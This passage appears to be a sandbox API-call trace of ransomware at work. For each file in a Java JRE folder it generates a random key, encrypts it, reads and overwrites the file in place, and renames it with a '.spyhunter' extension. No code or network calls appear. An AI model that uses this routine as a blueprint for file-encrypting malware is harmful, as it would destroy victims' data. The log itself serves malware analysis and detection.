(x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra.spyhunter")) returned 1 [0126.527] GetProcessHeap () returned 0x2c0000 [0126.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.527] GetProcessHeap () returned 0x2c0000 [0126.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.527] GetProcessHeap () returned 0x2c0000 [0126.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60240 | out: hHeap=0x2c0000) returned 1 [0126.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf740 | out: pbBuffer=0x25cf740) returned 1 [0126.527] GetProcessHeap () returned 0x2c0000 [0126.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf738*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf738*=0x30) returned 1 [0126.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.527] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan") returned 58 [0126.527] StrStrW (lpFirst="Abidjan", lpSrch=".txt") returned 0x0 [0126.527] GetProcessHeap () returned 0x2c0000 [0126.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.528] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf6fc*=0x41, lpOverlapped=0x0) returned 1 [0126.528] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.528] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf6fc*=0x41, lpOverlapped=0x0) returned 1 [0126.528] GetProcessHeap () returned 0x2c0000 [0126.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.529] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.529] WriteFile (in: hFile=0x170, lpBuffer=0x25cf73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf73c*, lpNumberOfBytesWritten=0x25cf6fc*=0x4, lpOverlapped=0x0) returned 1 [0126.529] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6fc*=0x30, lpOverlapped=0x0) returned 1 [0126.529] CloseHandle (hObject=0x170) returned 1 [0126.529] GetProcessHeap () returned 0x2c0000 [0126.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.529] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan.spyhunter") returned 68 [0126.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan.spyhunter")) returned 1 [0126.553] GetProcessHeap () returned 0x2c0000 [0126.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.553] GetProcessHeap () returned 0x2c0000 [0126.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.553] GetProcessHeap () returned 0x2c0000 [0126.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60180 | out: hHeap=0x2c0000) returned 1 [0126.553] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf740 | out: pbBuffer=0x25cf740) returned 1 [0126.553] GetProcessHeap () returned 0x2c0000 [0126.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf738*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf738*=0x30) returned 1 [0126.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.554] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security") returned 63 [0126.554] StrStrW (lpFirst="java.security", lpSrch=".txt") returned 0x0 [0126.554] GetProcessHeap () returned 0x2c0000 [0126.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.554] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf6fc*=0x2800, lpOverlapped=0x0) returned 1 [0126.611] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.611] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf6fc*=0x2800, lpOverlapped=0x0) returned 1 [0126.611] GetProcessHeap () returned 0x2c0000 [0126.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.611] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.611] WriteFile (in: hFile=0x170, lpBuffer=0x25cf73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf73c*, lpNumberOfBytesWritten=0x25cf6fc*=0x4, lpOverlapped=0x0) returned 1 [0126.681] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6fc*=0x30, lpOverlapped=0x0) returned 1 [0126.681] CloseHandle (hObject=0x170) returned 1 [0126.681] GetProcessHeap () returned 0x2c0000 [0126.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.681] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security.spyhunter") returned 73 [0126.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security.spyhunter")) returned 1 [0126.682] GetProcessHeap () returned 0x2c0000 [0126.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.682] GetProcessHeap () returned 0x2c0000 [0126.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.682] GetProcessHeap () returned 0x2c0000 [0126.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbff88 | out: hHeap=0x2c0000) returned 1 [0126.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf738 | out: pbBuffer=0x25cf738) returned 1 [0126.682] GetProcessHeap () returned 0x2c0000 [0126.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.682] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf730*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf730*=0x30) returned 1 [0126.682] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.683] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy") returned 61 [0126.683] StrStrW (lpFirst="java.policy", lpSrch=".txt") returned 0x0 [0126.683] GetProcessHeap () returned 0x2c0000 [0126.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.683] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf6f4*=0x8ce, lpOverlapped=0x0) returned 1 [0126.734] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff732, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.735] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x8ce, lpNumberOfBytesWritten=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf6f4*=0x8ce, lpOverlapped=0x0) returned 1 [0126.735] GetProcessHeap () returned 0x2c0000 [0126.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.735] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.735] WriteFile (in: hFile=0x170, lpBuffer=0x25cf734*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf734*, lpNumberOfBytesWritten=0x25cf6f4*=0x4, lpOverlapped=0x0) returned 1 [0126.735] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6f4*=0x30, lpOverlapped=0x0) returned 1 [0126.735] CloseHandle (hObject=0x170) returned 1 [0126.735] GetProcessHeap () returned 0x2c0000 [0126.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.736] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy.spyhunter") returned 71 [0126.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy.spyhunter")) returned 1 [0126.737] GetProcessHeap () returned 0x2c0000 [0126.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.737] GetProcessHeap () returned 0x2c0000 [0126.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.737] GetProcessHeap () returned 0x2c0000 [0126.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfdf8 | out: hHeap=0x2c0000) returned 1 [0126.737] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf738 | out: pbBuffer=0x25cf738) returned 1 [0126.737] GetProcessHeap () returned 0x2c0000 [0126.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.737] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf730*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf730*=0x30) returned 1 [0126.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.738] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts") returned 57 [0126.738] StrStrW (lpFirst="cacerts", lpSrch=".txt") returned 0x0 [0126.738] GetProcessHeap () returned 0x2c0000 [0126.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.738] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf6f4*=0x2800, lpOverlapped=0x0) returned 1 [0126.847] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.847] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf6f4*=0x2800, lpOverlapped=0x0) returned 1 [0126.847] GetProcessHeap () returned 0x2c0000 [0126.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.847] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.847] WriteFile (in: hFile=0x170, lpBuffer=0x25cf734*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf734*, lpNumberOfBytesWritten=0x25cf6f4*=0x4, lpOverlapped=0x0) returned 1 [0126.897] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6f4*=0x30, lpOverlapped=0x0) returned 1 [0126.897] CloseHandle (hObject=0x170) returned 1 [0126.985] GetProcessHeap () returned 0x2c0000 [0126.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.985] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts.spyhunter") returned 67 [0126.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts.spyhunter")) returned 1 [0126.986] GetProcessHeap () returned 0x2c0000 [0126.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.986] GetProcessHeap () returned 0x2c0000 [0126.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.986] GetProcessHeap () returned 0x2c0000 [0126.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fac0 | out: hHeap=0x2c0000) returned 1 [0126.986] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf730 | out: pbBuffer=0x25cf730) returned 1 [0126.986] GetProcessHeap () returned 0x2c0000 [0126.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.986] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf728*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf728*=0x30) returned 1 [0126.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.987] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template") returned 79 [0126.987] StrStrW (lpFirst="jmxremote.password.template", lpSrch=".txt") returned 0x0 [0126.987] GetProcessHeap () returned 0x2c0000 [0126.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.987] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf6ec*=0xb28, lpOverlapped=0x0) returned 1 [0127.016] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff4d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.016] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb28, lpNumberOfBytesWritten=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf6ec*=0xb28, lpOverlapped=0x0) returned 1 [0127.016] GetProcessHeap () returned 0x2c0000 [0127.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.016] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.016] WriteFile (in: hFile=0x170, lpBuffer=0x25cf72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf72c*, lpNumberOfBytesWritten=0x25cf6ec*=0x4, lpOverlapped=0x0) returned 1 [0127.017] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6ec*=0x30, lpOverlapped=0x0) returned 1 [0127.017] CloseHandle (hObject=0x170) returned 1 [0127.017] GetProcessHeap () returned 0x2c0000 [0127.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.017] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template.spyhunter") returned 89 [0127.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template.spyhunter")) returned 1 [0127.018] GetProcessHeap () returned 0x2c0000 [0127.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.018] GetProcessHeap () returned 0x2c0000 [0127.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.018] GetProcessHeap () returned 0x2c0000 [0127.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea558 | out: hHeap=0x2c0000) returned 1 [0127.018] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf730 | out: pbBuffer=0x25cf730) returned 1 [0127.018] GetProcessHeap () returned 0x2c0000 [0127.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.019] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf728*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf728*=0x30) returned 1 [0127.019] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0127.020] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access") returned 68 [0127.020] StrStrW (lpFirst="jmxremote.access", lpSrch=".txt") returned 0x0 [0127.020] GetProcessHeap () returned 0x2c0000 [0127.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.020] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf6ec*=0xf9e, lpOverlapped=0x0) returned 1 [0127.021] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff062, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.021] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xf9e, lpNumberOfBytesWritten=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf6ec*=0xf9e, lpOverlapped=0x0) returned 1 [0127.021] GetProcessHeap () returned 0x2c0000 [0127.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.021] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.022] WriteFile (in: hFile=0x170, lpBuffer=0x25cf72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf72c*, lpNumberOfBytesWritten=0x25cf6ec*=0x4, lpOverlapped=0x0) returned 1 [0127.022] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6ec*=0x30, lpOverlapped=0x0) returned 1 [0127.022] CloseHandle (hObject=0x170) returned 1 [0127.022] GetProcessHeap () returned 0x2c0000 [0127.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.022] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access.spyhunter") returned 78 [0127.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access.spyhunter")) returned 1 [0127.023] GetProcessHeap () returned 0x2c0000 [0127.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.023] GetProcessHeap () returned 0x2c0000 [0127.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.023] GetProcessHeap () returned 0x2c0000 [0127.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d038 | out: hHeap=0x2c0000) returned 1 [0127.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf728 | out: pbBuffer=0x25cf728) returned 1 [0127.024] GetProcessHeap () returned 0x2c0000 [0127.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf720*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf720*=0x30) returned 1 [0127.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0127.024] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf") returned 69 [0127.024] StrStrW (lpFirst="LucidaBrightItalic.ttf", lpSrch=".txt") returned 0x0 [0127.025] GetProcessHeap () returned 0x2c0000 [0127.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.025] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf6e4*=0x2800, 